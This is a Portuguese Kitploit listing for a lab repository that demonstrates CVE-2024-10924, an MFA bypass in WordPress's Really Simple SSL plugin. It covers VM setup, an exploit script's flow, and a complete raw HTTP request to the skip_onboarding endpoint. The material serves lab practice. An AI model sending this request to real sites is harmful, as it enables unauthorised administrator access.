Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-10924-Bypass-MFA-Wordpress-LAB — Ambiente de laboratório e script de exploit para CVE-2024-10924, demonstrando bypass de MFA no WordPress através do endpoint skip_onboarding do plugin Really Simple SSL. | Kitploit
Ferramentas/GitHubGitHub/d1se0/cve-2024-10924-bypass-mfa-wordpress-lab
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebCTFTestes de PenetraçãoAutenticaçãoAprendizado e EducaçãoLabs e Prática

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
GitHub
d1se0/cve-2024-10924-bypass-mfa-wordpress-lab

CVE-2024-10924-Bypass-MFA-Wordpress-LAB

Ambiente de laboratório e script de exploit para CVE-2024-10924, demonstrando bypass de MFA no WordPress através do endpoint skip_onboarding do plugin Really Simple SSL.

Ver Repositório
4há 1 anoAinda não revisado

CVE-2024-10924 Bypass de MFA no WordPress - Laboratório de Exploit

Este repositório fornece um laboratório para explorar a vulnerabilidade CVE-2024-10924 no WordPress, especificamente para contornar two-factor authentication (MFA) e obter acesso ao painel de administração do WordPress.

Pré-requisitos

Para implantar este laboratório no seu ambiente, siga os passos abaixo:

Implantar WordPress no VMware

Você terá que descompactar o zip do LAB, no VMWare você terá que clicar em Open para importar uma máquina, selecione o arquivo chamado Ubuntu-Bypass-MFA-Wordpress.vmx, e finalmente terá que clicar em Power para ligar a máquina vulnerável.

Baixar LAB

Configurar Kali Linux

Na sua máquina Kali, instale as ferramentas necessárias e certifique-se de ter os seguintes aplicativos instalados:

  • nmap: Para realizar varreduras de rede.
  • requests: Para fazer requisições HTTP (se não tiver, instale requests com pip install requests).
  • rich: Para saída elegante no console (instale com pip install rich).

Obter o IP da máquina WordPress

Para obter o IP da máquina WordPress no ambiente de rede, execute o seguinte script a partir da sua máquina Kali:

root@kitploit:~
$ python3 knowIPwordpress.py
root@kitploit:~
This script does the following:

Detect your local IP. Scans the corresponding network segment to find active IPs. Perform a port scan for HTTP services. Check that the WordPress machine's IP has the title "Bypass-MFA" in its HTTP service. Once found, it will show you the URL where you can access the WordPress administration panel:

root@kitploit:~
Accede a WordPress en: http://<IP>/wp-admin

Bypass de Verificação Dupla (MFA):

Credenciais do WordPress:

root@kitploit:~
admin:admin

Quando tentar fazer login no WordPress, ele solicitará two-factor verification (MFA). Para contornar esta etapa, execute o seguinte script no seu Kali:

root@kitploit:~
$ python3 bypass-MFA-Wordpress.py

Como funciona o script bypass-MFA-Wordpress.py Este script explora a vulnerabilidade CVE-2024-10924 e contorna a verificação dupla para obter acesso ao painel de administração do WordPress.

Fluxo do script:

Obter cookie de sessão: O script faz uma requisição HTTP para o endpoint reallysimplessl/v1/two_fa/skip_onboarding para obter um cookie de sessão válido.

A requisição é enviada com as seguintes informações:

root@kitploit:~
{
    "user_id": 1,
    "login_nonce": "133333337",
    "redirect_to": "/wp-admin/"
}

Requisição de Login:

Uma vez obtido o cookie, o script solicita o nome de usuário e senha do WordPress. Em seguida, faz uma requisição POST para o endpoint wp-admin/profile.php com as credenciais fornecidas para fazer login.

Geração de um arquivo HTML:

Se o bypass for bem-sucedido, o script salva a resposta do painel de administrador em um arquivo .html e o abre no seu navegador padrão.

Agora você terá acesso ao painel de administração do WordPress!

Método manual Bypass-MFA-Wordpress:

Se você quiser fazer manualmente com BurpSuite e quer saber o Endpoint para o qual devemos enviar a requisição para capturar os Cookies, podemos fazer da seguinte maneira

root@kitploit:~
$ python3 endpointWordpress.py

Isso nos dirá o código que teremos que colocar no BurpSuite para capturar os Cookies, no meu caso seria algo como:

root@kitploit:~
POST http://192.168.5.192/?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding HTTP/1.1
Host: 192.168.5.192
Content-Type: application/json
Content-Length: 89
Connection: keep-alive

{
    "user_id": 1,
    "login_nonce": "133333337",
    "redirect_to": "/wp-admin/"
}

Executando a técnica manual em formato de vídeo:

https://github.com/user-attachments/assets/e70789d1-4fe4-46b4-81ef-76229dd265ce

Mais informações no meu vídeo do YT:

LINK = Vídeo CVE-2024-10924-Bypass-MFA-Wordpress-LAB

Baixar ferramenta